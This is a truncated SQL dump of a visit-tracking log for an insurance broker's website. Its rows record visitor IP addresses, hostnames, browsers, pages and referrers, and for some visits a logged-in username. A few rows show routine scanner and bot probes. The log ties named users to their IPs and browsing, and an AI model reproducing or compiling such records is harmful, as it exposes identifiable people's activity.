http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(26799,'0b_c6851fdcfa05afb5ec6b425ca35ebc6f','1462798880','5.9.89.170','static.170.89.9.5.clients.your-server.de','/quotes.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(26801,'0b_c6851fdcfa05afb5ec6b425ca35ebc6f','1462798884','5.9.89.170','static.170.89.9.5.clients.your-server.de','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(26804,'0b_e0bd4dd616baddff6bf01e3d9599b3ca','1462799959','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(26807,'0b_e6b4955b4a8544ccc61c8d55c949015b','1462799959','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(26808,'0b_e6b4955b4a8544ccc61c8d55c949015b','1462799961','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(26811,'0b_e0bd4dd616baddff6bf01e3d9599b3ca','1462799961','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(26813,'0b_3c9006d9d52450602d2c919d95d5bbbf','1462800795','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26814,'0b_afb4a431d5e754e78918c10894f312cb','1462801564','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(26817,'0b_eafc0c09f98d25511015371d849502b8','1462802066','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(26819,'0b_5f71a00889ec5b2727cbfee2599756ed','1462802071','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(26822,'0b_5f71a00889ec5b2727cbfee2599756ed','1462802078','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(26823,'0b_5f71a00889ec5b2727cbfee2599756ed','1462802103','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(26825,'0b_55d819572e43aaa10209af0aea6aba32','1462802778','81.17.22.206','81.17.22.206','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ua','','','','','','','0','0',0),(26828,'0b_5f71a00889ec5b2727cbfee2599756ed','1462803389','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(26829,'0b_5f71a00889ec5b2727cbfee2599756ed','1462803394','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(26832,'0b_5f71a00889ec5b2727cbfee2599756ed','1462803398','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(26835,'0b_e7b2820d2f2242c75897969498c51cc8','1462804122','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(26837,'0b_e7b2820d2f2242c75897969498c51cc8','1462804124','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(26840,'0b_0aa15efaae83c50a5c58f1c4f5e639da','1462804309','192.210.217.23','192-210-217-23-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(26843,'0b_0aa15efaae83c50a5c58f1c4f5e639da','1462804311','192.210.217.23','192-210-217-23-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(26844,'0b_6bdac603ba88f8b999cad81239f1dbc8','1462804503','69.199.178.14','69.199.178.14','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.bing.com/search?q=empire%20insurance%20broker%20california&qs=n&form=QBRE&pq=empire%20insurance%20broker%20california&sc=0-34&sp=-1&sk=&cvid=BE107D7A986248E2A9216A41E45A1A16','empire insurance broker california',1,'Win7','Chrome 50','us','1920 x 1080','Bing','','','','','0','0',0),(26846,'0b_6bdac603ba88f8b999cad81239f1dbc8','1462804526','69.199.178.14','69.199.178.14','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26849,'0b_6bdac603ba88f8b999cad81239f1dbc8','1462804540','69.199.178.14','69.199.178.14','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26852,'0b_6bdac603ba88f8b999cad81239f1dbc8','1462804668','69.199.178.14','69.199.178.14','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26855,'0b_992539174ed58782cad2ba76b819fca6','1462804903','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26858,'0b_992539174ed58782cad2ba76b819fca6','1462804904','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26861,'0b_992539174ed58782cad2ba76b819fca6','1462804942','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26862,'0b_992539174ed58782cad2ba76b819fca6','1462804942','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26865,'0b_992539174ed58782cad2ba76b819fca6','1462805152','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26867,'0b_e1f886af512ed8b11843dad64dad4ebe','1462805154','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(26870,'0b_aff0a305728f20af5ecdeb81f9509d49','1462805155','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','','',0,'Win7 x64','Firefox 46','us','1920 x 1080','','','','','','0','0',0),(26871,'0b_e1f886af512ed8b11843dad64dad4ebe','1462805156','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(26873,'0b_aff0a305728f20af5ecdeb81f9509d49','1462805156','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 46','us','1920 x 1080','','','','','','0','0',0),(26876,'0b_aff0a305728f20af5ecdeb81f9509d49','1462805204','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 46','us','1920 x 1080','','','','','','0','0',0),(26879,'0b_e1f886af512ed8b11843dad64dad4ebe','1462805206','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(26880,'0b_e1f886af512ed8b11843dad64dad4ebe','1462805220','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(26882,'0b_e1f886af512ed8b11843dad64dad4ebe','1462805322','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(26885,'0b_e1f886af512ed8b11843dad64dad4ebe','1462805325','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(26886,'0b_992539174ed58782cad2ba76b819fca6','1462805539','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26888,'0b_992539174ed58782cad2ba76b819fca6','1462805539','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26891,'0b_992539174ed58782cad2ba76b819fca6','1462805541','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26894,'0b_992539174ed58782cad2ba76b819fca6','1462805544','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26895,'0b_992539174ed58782cad2ba76b819fca6','1462805553','69.164.140.246','69.164.140.246.xchangetele.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26898,'0b_992539174ed58782cad2ba76b819fca6','1462805624','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26900,'0b_9495a3f49979e92774627e68201ed406','1462806224','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(26901,'0b_9495a3f49979e92774627e68201ed406','1462806229','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(26904,'0b_9495a3f49979e92774627e68201ed406','1462806232','184.154.139.23','placeholder.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(26907,'0b_9495a3f49979e92774627e68201ed406','1462806235','184.154.139.23','placeholder.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(26910,'0b_9495a3f49979e92774627e68201ed406','1462806237','184.154.139.23','placeholder.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(26912,'0b_9495a3f49979e92774627e68201ed406','1462806239','184.154.139.23','placeholder.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(26913,'0b_fdb7de88e3bbdf159d8b2e4670d2766c','1462806248','184.154.139.23','placeholder.sitelock.com','/?page_id=171?a=pwdreset','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(26915,'0b_e1f886af512ed8b11843dad64dad4ebe','1462807020','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(26916,'0b_e1f886af512ed8b11843dad64dad4ebe','1462807022','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(26918,'0b_992539174ed58782cad2ba76b819fca6','1462808039','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26921,'0b_992539174ed58782cad2ba76b819fca6','1462808039','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26922,'0b_992539174ed58782cad2ba76b819fca6','1462808040','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26925,'0b_992539174ed58782cad2ba76b819fca6','1462808041','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26927,'0b_992539174ed58782cad2ba76b819fca6','1462808042','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','0',0),(26930,'0b_992539174ed58782cad2ba76b819fca6','1462808047','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26933,'0b_992539174ed58782cad2ba76b819fca6','1462808054','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','zenwirth','','0','51',0),(26936,'0b_f3c8f984dcb68d6a33129556d894dc0a','1462808617','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26939,'0b_4026cca59752730a1999615446f33af4','1462810598','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(26940,'0b_4026cca59752730a1999615446f33af4','1462810602','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26943,'0b_4026cca59752730a1999615446f33af4','1462810617','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26945,'0b_6734028faf9c0a77ba313427dd7d06ed','1462810761','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(26948,'0b_6734028faf9c0a77ba313427dd7d06ed','1462810772','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(26949,'0b_4026cca59752730a1999615446f33af4','1462810801','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','Wperl','','0','51',0),(26951,'0b_025a48f591fc72736193f0e7cb794604','1462810810','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(26954,'0b_025a48f591fc72736193f0e7cb794604','1462810811','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(26955,'0b_6734028faf9c0a77ba313427dd7d06ed','1462810804','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(26957,'0b_6734028faf9c0a77ba313427dd7d06ed','1462810820','50.108.153.152','50.108.153.152','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(26960,'0b_4ca20f9dba9562c577f112fe69295edb','1462810827','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(26961,'0b_1147b6b62a9fea05074c666c58b693fd','1462810888','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(26964,'0b_bc35a15af69ca316d85e959919d08de4','1462810888','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26967,'0b_16b6b6bb6aa4c44df5c818c578c28944','1462810889','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(26970,'0b_bc35a15af69ca316d85e959919d08de4','1462810890','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26972,'0b_a3eab2cebcda7c5e21e5f0e60ec90aad','1462810894','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(26973,'0b_a3eab2cebcda7c5e21e5f0e60ec90aad','1462810904','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(26976,'0b_bc35a15af69ca316d85e959919d08de4','1462810934','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(26978,'0b_bc35a15af69ca316d85e959919d08de4','1462810943','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','admin','','0','51',0),(26981,'0b_bc35a15af69ca316d85e959919d08de4','1462810948','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','admin','','0','51',0),(26982,'0b_bfda87c8a34219329b5172ac14255a89','1462811138','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(26985,'0b_bfda87c8a34219329b5172ac14255a89','1462811139','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 